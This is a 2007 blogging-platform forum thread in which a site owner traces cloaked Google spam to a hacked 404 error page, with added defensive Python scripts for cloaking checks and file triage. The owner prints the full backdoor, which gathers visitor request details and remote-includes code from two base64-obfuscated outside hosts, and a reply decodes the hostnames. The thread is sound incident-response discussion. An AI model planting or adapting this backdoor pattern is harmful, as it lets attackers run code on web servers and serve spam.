1 Nov 15, 2007 18:32    

My b2evolution Version: 1.10.x

Hi everyone,

I've been experiencing something odd for the past several months. My server error logs are showing that Google is requesting hundreds of non-existent URLs. All the URLs have spammy filenames such as:

/blog/skins/bluesky/patch-invisible-ip-map-2.7.html

/blog/skins/bluesky/download-full-version-soldier-of-fortune-2-free.html

and so on...

What makes this even more odd is that I've been able to force Google to cough up cached versions of the URLs it's requesting. So somehow Google has been misled into believing that they exist and has been fed content for them.

These cached versions don't seem to contain any external links, but instead have internal links to other non-existent URLs creating what appears to be an endless loop of non-existent URLs.

What the heck is going on? Has anybody else seen this?

I'm looking forward to hearing what people think.
Thanks in advance.
Jade

2 Nov 26, 2007 17:05

Hi again, it's been a while and nobody's given any indication of whether this problem is unique or common.

I'm still seeing this, sometimes 1000s of URLs in a single day and I'd like to find out what's causing it.

Anyone out there have any thoughts?
Thanks,
Jade

3 Nov 26, 2007 17:13

What is the exact line you find in the logs (please one example, not all of them B)

4 Nov 26, 2007 17:22

I can *show* you what it is, using firefox and a simple addon.

Go here: https://addons.mozilla.org/en-US/firefox/addon/59

Install the user agent switcher.

Set it up so that you can spoof Google. The info you need specifically is this:

useragent: google

the rest of the lines: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)

Once you've done that, spoof your user agent and take a look at THIS page:

http://yoga-teacher-training.org/blog/skins/bluesky/download-full-version-soldier-of-fortune-2-free.html
its here as well:

http://yoga-teacher-training.org/blog/skins/bluesky/index.php

What you will see, is what Googlebot will see, and it sees what it thinks it sees, in other words, it's there, virtually, if not physically.

--

The specific cause? No telling, without looking further at your files, but you can be assured your site has been exploited.

PS: You can see a rough unformatted version of the same thing at this url (continuing to spoof Googlebot):

http://yoga-teacher-training.org/blog/skins/bluesky/

---

I CAN tell you that that's one of the trickier hacks/exploits on the web -- providing spam content to Google while preventing the average Joe from seeing it. See how long it worked for you? :(

First thing I would be doing is going through my files, ALL of them; you might start by looking at files that weren't specifically upgraded the last time you did one. Skin files(!!??).. Look for ANY odd javascript, anything that looks encoded, anything that looks out of place, anything. Look for files that have odd timestamps (every time a file is edited an updated timestamp is applied to it) -- if all files in one directory have one timestamp and another doesn't, but instead has a more recent one, look LONG and hard at that file.

You also want to check your permissions while you are at it. chmodding 777 is the most common downfall for people. Don't use it, unless you absolutely have no choice.

I would help you further look through the files, but I'm way too frazzled.

If you just want to try to wipe the slate clean you can do that also..

DELETE and then reupload FRESH copies of ANY and ALL files that were not replaced during your last upgrade.

--

If this wasn't an upgrade, the same suggestions apply.
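The "see what Googlebot sees" check from the post above, as an added example (not code from the forum or from b2evolution): it requests one URL under several client identities and reports where the responses diverge. The identities are constructed for the demo; a browser arriving from a search result page is included because the backdoor discussed later in this thread forwards the Referer as well as the User-Agent to its controller, so either header may be what triggers the spam page.

```python
"""Added example, not from the forum post: request one URL under several
client identities and report where the responses diverge, which is the
symptom of the search-engine cloaking described above.  Only fetch() touches
the network; classify() is pure so it can be checked on constructed data."""
import hashlib
import sys
import urllib.error
import urllib.request

# Constructed identities.  The backdoor in this thread forwards both the
# User-Agent and the Referer to its controller, so a spoofed bot UA and a
# browser arriving from a search result page are both worth trying.
FIREFOX = "Mozilla/5.0 (X11; Linux x86_64; rv:115.0) Gecko/20100101 Firefox/115.0"
PROFILES = {
    "browser": {"User-Agent": FIREFOX},
    "googlebot": {"User-Agent": "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"},
    "from_google": {"User-Agent": FIREFOX, "Referer": "https://www.google.com/search?q=test"},
}

def fetch(url, headers, timeout=15):
    """Return (status, body).  A 404 is a valid observation, not an error."""
    req = urllib.request.Request(url, headers=headers)
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read()
    except urllib.error.HTTPError as err:
        return err.code, err.read()

def classify(results, size_ratio=1.5):
    """results: {profile: (status, body)}.  Returns [(profile, severity, detail)].
    A status difference against the plain browser is 'strong'.  A body that
    differs only by hash is 'weak', because dynamic pages differ legitimately,
    unless the size also jumps by more than size_ratio, which is 'strong'."""
    base_status, base_body = results["browser"]
    base_hash = hashlib.sha256(base_body).hexdigest()
    out = []
    for name, (status, body) in results.items():
        if name == "browser":
            continue
        if status != base_status:
            out.append((name, "strong", f"status {status} vs {base_status}"))
            continue
        if hashlib.sha256(body).hexdigest() == base_hash:
            continue
        big = max(len(body), len(base_body))
        small = max(1, min(len(body), len(base_body)))
        sev = "strong" if big / small > size_ratio else "weak"
        out.append((name, sev, f"body {len(body)} bytes vs {len(base_body)} bytes"))
    return out

def check_url(url):
    """Fetch url under every profile and classify the spread."""
    return classify({name: fetch(url, hdrs) for name, hdrs in PROFILES.items()})

if __name__ == "__main__":
    hits = check_url(sys.argv[1]) or [("-", "none", "no divergence seen")]
    for name, sev, detail in hits:
        print(f"{name:12} {sev:6} {detail}")
```

Run it as `python cloak_check.py <url>`. The pattern the original poster reports, a 404 for a normal visitor and a 200 with spam for the Googlebot identity, comes out as a "strong" finding; a weak finding on a page that embeds a timestamp or session token is expected and not evidence on its own.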

5 Nov 26, 2007 17:37

And for future reference, please post the URL to your blog when asking these types of questions. (Note to all)

I'm smart and don't mind going out of my way to find things.. but you might have gotten an answer sooner from someone else had they just been provided the info.

PS: snippits of log files are not necessary

------

On a side note, it's useful for people to check their sites occasionally -- to "see" just what Googlebot sees.

6 Nov 26, 2007 17:46

Afwas wrote:

What is the exact line you find in the logs (please one example, not all of them B)

Thanks for the interest. Here's a line:

[Mon Nov 26 07:34:41 2007] [error] [client 66.249.70.85] File does not exist: /home/**removed-for-security-reasons**/public_html/ytt/blog/skins/bluesky/seeed-ding-mp3-download.html

7 Nov 26, 2007 17:57

I've already told you what to do to start.. please read before responding further.

8 Nov 26, 2007 17:58

whoo wrote:

I can *show* you what it is, using firefox and a simple addon.

whoo wrote:

The specific cause? No telling, without looking further at your files, but you can be assured your site has been exploited.

I CAN tell you that thats one of the more trickier hacks/exploits on the web -- providing spam content to Google while preventing the average Joe from seeing it. See how long it worked for you? :(

Thanks whoo. I really appreciate the suggestion. I've used a lot of Firefox extensions before, but never this one. This one is great and it's helped me to realize that the problem is ongoing.

Since my error logs were showing googlebot requesting non-existent pages and getting not-found errors, I assumed that googlebot wasn't continuing to see these spammy pages.

But with this extension, I see that Google is still being fed the content.

So, with your suggestions and with other thoughts that occur to me now that I understand this better I will dig in more deeply and see if I can put an end to this.

Thanks so much for your help. I'll respond later with any results I achieve.

And by the way, I apologize for not posting the blog URL right away. I held it back for a couple of reasons. First, I thought the pages did not exist, so there was nothing to be seen. Second, I thought it might be discouraged since some forums have people posting purely to gain incoming links. Lastly, since I didn't know the cause of the problem, I didn't want to advertise the URL in case the description of the problem might indicate our vulnerability and along with the URL it might expose us to even more exploits.

But I take your point and appreciate your willingness to help anyway.

Regards,
Jade

9 Nov 26, 2007 17:59

whoo wrote:

I've already told you what to do to start.. please read before responding further.

Hi whoo, I was responding to posts in order. Thanks.

10 Nov 26, 2007 18:02

jade,

No worries ..good luck

11 Nov 26, 2007 19:00

Hi again,

I've been looking at everything and the likely culprit seems to be the error page (as specified in the .htaccess). It's got the filename: 236731.php and contains the following code:

<?
error_reporting(0);
$s = "e";
// Collect request details, falling back to the old register_globals names.
$a = (isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);
$b = (isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);
$c = (isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);
$d = (isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);
$e = (isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);
$f = (isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);
$g = (isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);
$h = (isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);
$i = (isset($_SERVER["SCRIPT_FILENAME"]) ? $_SERVER["SCRIPT_FILENAME"] : $SCRIPT_FILENAME);
$j = (isset($_SERVER["HTTP_ACCEPT_LANGUAGE"]) ? $_SERVER["HTTP_ACCEPT_LANGUAGE"] : $HTTP_ACCEPT_LANGUAGE);
// Pack everything, base64-encoded and dot-separated, into one query string.
$str = base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s.".base64_encode($i).".".base64_encode($j);
// Remote include of "http://" + hostname + "/?" + $str: whatever the remote
// server answers with is served (and, being include()d, executed) as the error page.
if ((include(base64_decode("aHR0cDovLw==").base64_decode("d3d3My5yc3NuZXdzLndz")."/?".$str))) {
} else {
    include(base64_decode("aHR0cDovLw==").base64_decode("d3d3My54bWxkYXRhLmluZm8=")."/?".$str);
}
?>

Does anyone see anything suspicious here?

I made a copy of this and then edited it to echo the words "Page Not Found" and uploaded it. Now the google user agent in firefox receives that echoed text when visiting the spammy links instead of the spam pages.

I think it might be the else/if statements in the error page. Am I right?

Jade

12 Nov 26, 2007 19:09

Don't worry over picking out exactly what inside the file is the problem -- the file IS the problem.

Make sure that your .htaccess is NOT world writable. HUGE mistake if that's the case. 644 == optimal

Change whatever is inside your .htaccess that is redirecting to that, delete that file, or save it for posterity, forward it to your host, etc..

13 Nov 26, 2007 19:22

whoo wrote:

Don't worry over picking out exactly what inside the file is the problem -- the file IS the problem.

Make sure that your .htaccess is NOT world writable. HUGE mistake if that's the case. 644 == optimal

Change whatever is inside your .htaccess that is redirecting to that, delete that file, or save it for posterity, forward it to your host, etc..

Thanks for the confirmation. I've made the necessary changes. The .htaccess file was 755, which I would never do myself.

The obsessive compulsive part of myself would like to dig into it more to see if I could uncover its source and purpose (since none of the links on the spammy pages seemed to point to external links).

But I may never know. I inherited this blog installation when I took over a client's site and then noticed this problem only after moving their site to a new host a few months ago (the new host has better error reporting).

Anyway, I'm glad to have solved it. So, thanks again for your excellent help.

Jade

14 Nov 26, 2007 19:33

jadeb wrote:

The obsessive compulsive part of myself would like to dig into it more to see if I could uncover its source and purpose (since none of the links on the spammy pages seemed to point to external links).

if ((include(base64_decode("aHR0cDovLw==").base64_decode("d3d3My5yc3NuZXdzLndz")."/?".$str))){}
else {include(base64_decode("aHR0cDovLw==").base64_decode("d3d3My54bWxkYXRhLmluZm8=")."/?".$str);} ?>

==

http://www3.rssnews.ws/ & http://www3.xmldata.info/

Just in case you fancy whois and reporting to hosts ;)

¥
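The file-by-file review whoo describes in post 4, the .htaccess and permission checks from post 12, and the base64 decoding ¥åßßå did by hand in post 14, as one added example (not code from the forum or from b2evolution): an offline triage script for a web root. It decodes every base64_decode("...") literal in PHP files so hidden hostnames become readable, flags the indicator combination the posted 236731.php shows, lists ErrorDocument targets in .htaccess files, reports world-writable files, and points out files whose timestamp is far newer than their siblings. The sample tree built by build_demo_root() is constructed for the demo (its .htaccess is deliberately 666), and the outlier threshold and indicator list are my choices.

```python
"""Added example, not code from the forum or from b2evolution: offline
triage of a web root for the cloaked error-page backdoor in this thread.
The demo tree from build_demo_root() is constructed; thresholds are mine."""
import base64
import os
import re
import stat
import statistics
import tempfile
import time

B64_LITERAL = re.compile(r'base64_decode\(\s*["\']([A-Za-z0-9+/=]+)["\']\s*\)')
ERRORDOC = re.compile(r'^\s*ErrorDocument\s+(\d{3})\s+(\S+)', re.M)

# Indicators taken from the file posted in this thread.  error_reporting(0)
# alone is common in clean code; two or more together is worth a look.
INDICATORS = {
    "silences_errors": re.compile(r'error_reporting\s*\(\s*0\s*\)'),
    "include_of_decoded": re.compile(r'include(?:_once)?\s*\(\s*base64_decode'),
    "reads_user_agent": re.compile(r'HTTP_USER_AGENT'),
    "reads_referer": re.compile(r'HTTP_REFERER'),
}

# Trimmed copy of the posted 236731.php (post 11 above), used as demo input.
SAMPLE_PHP = '''<? error_reporting(0);
$g=$_SERVER["HTTP_USER_AGENT"];$f=$_SERVER["HTTP_REFERER"];$str=base64_encode($g).".".base64_encode($f);
if ((include(base64_decode("aHR0cDovLw==").base64_decode("d3d3My5yc3NuZXdzLndz")."/?".$str))){}
else {include(base64_decode("aHR0cDovLw==").base64_decode("d3d3My54bWxkYXRhLmluZm8=")."/?".$str);} ?>'''

def decode_literals(src):
    """[(encoded, decoded)] for every base64_decode("...") literal in src."""
    out = []
    for enc in B64_LITERAL.findall(src):
        try:
            out.append((enc, base64.b64decode(enc, validate=True).decode("utf-8", "replace")))
        except ValueError:
            out.append((enc, "<invalid base64>"))
    return out

def assess_php(src):
    """Return (indicator_names, remote_include_targets).  The posted file keeps
    the scheme and the host in separate literals and concatenates them, so
    adjacent "http://" + host pairs are reassembled here."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(src)]
    decoded = [d for _, d in decode_literals(src)]
    remote = [d + decoded[i + 1] for i, d in enumerate(decoded[:-1])
              if d in ("http://", "https://")]
    return hits, remote

def errordoc_targets(htaccess_text):
    """[(status_code, target)] for each ErrorDocument directive."""
    return ERRORDOC.findall(htaccess_text)

def scan_tree(root, outlier_days=7):
    """Walk root and return [(path, finding)]."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        mtimes = {}
        for fn in files:
            p = os.path.join(dirpath, fn)
            st = os.lstat(p)
            if not stat.S_ISREG(st.st_mode):
                continue
            mtimes[p] = st.st_mtime
            if st.st_mode & stat.S_IWOTH:
                findings.append((p, "world-writable (mode %o)" % (st.st_mode & 0o777)))
            with open(p, errors="replace") as fh:
                text = fh.read()
            if fn == ".htaccess":
                findings += [(p, f"ErrorDocument {c} -> {t}")
                             for c, t in errordoc_targets(text) if t.lower().endswith(".php")]
            elif fn.lower().endswith((".php", ".phtml", ".inc")):
                hits, remote = assess_php(text)
                if len(hits) >= 2 or remote:
                    findings.append((p, f"indicators={hits} remote_include={remote}"))
        # The timestamp check from post 4: a file modified long after its siblings.
        if len(mtimes) >= 3:
            med = statistics.median(mtimes.values())
            findings += [(p, "mtime %d days newer than directory median" % ((t - med) // 86400))
                         for p, t in mtimes.items() if t - med > outlier_days * 86400]
    return findings

def build_demo_root():
    """Constructed skin directory: untouched skin files plus the backdoor."""
    root = tempfile.mkdtemp(prefix="skin-")
    old = time.time() - 400 * 86400
    for name in ("index.php", "style.css", "_main.php"):
        with open(os.path.join(root, name), "w") as fh:
            fh.write("<?php // placeholder skin file ?>\n")
        os.utime(os.path.join(root, name), (old, old))
    with open(os.path.join(root, "236731.php"), "w") as fh:
        fh.write(SAMPLE_PHP)  # fresh mtime: the outlier
    ht = os.path.join(root, ".htaccess")
    with open(ht, "w") as fh:
        fh.write("ErrorDocument 404 /blog/skins/bluesky/236731.php\n")
    os.utime(ht, (old, old))
    os.chmod(ht, 0o666)  # world-writable, the mistake post 12 warns about
    return root

if __name__ == "__main__":
    for path, finding in scan_tree(build_demo_root()):
        print(path, "->", finding)
```

Against a real install, call scan_tree() on the document root instead of the demo tree. The ErrorDocument check only lists targets; compare them against what the application itself ships, since a legitimate custom 404 handler is also a .php file. Note that the posted backdoor needs PHP's allow_url_include (or an older PHP where include() fetched URLs by default) to work at all, so turning that off and fixing the writable files closes this particular route even before the spam pages are cleaned out of Google's cache.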

15 Nov 26, 2007 19:52

¥åßßå wrote:

http://www3.rssnews.ws/ & http://www3.xmldata.info/

Just in case you fancy whois and reporting to hosts ;)

¥

Thanks for this. I assume you got these by decoding the strings.

Both of those URLs show no website available and the whois lookups show private registrations, so I'm not sure how to really complain in any useful way.

But hopefully this will be a warning for other members here. I found another one of these phony error pages in the skins/ folder, so I think it's possible that this was brought into the site through a skin. There could be a lot of other people out there suffering the same exploit who just haven't noticed it in their error logs.

16 Nov 26, 2007 20:11

There's also the possibility that this didn't come through evo but other software on the server ( not even in your folder, just any other account ) .... it's one of the joys of shared hosting.

¥

btw. the "no website", that's how I'd do it if I were a hacker; you don't need to "reply" to log an open victim ;)
The whois, on the other hand, will tell you the nameservers, and you can ping the site to narrow down the IP.
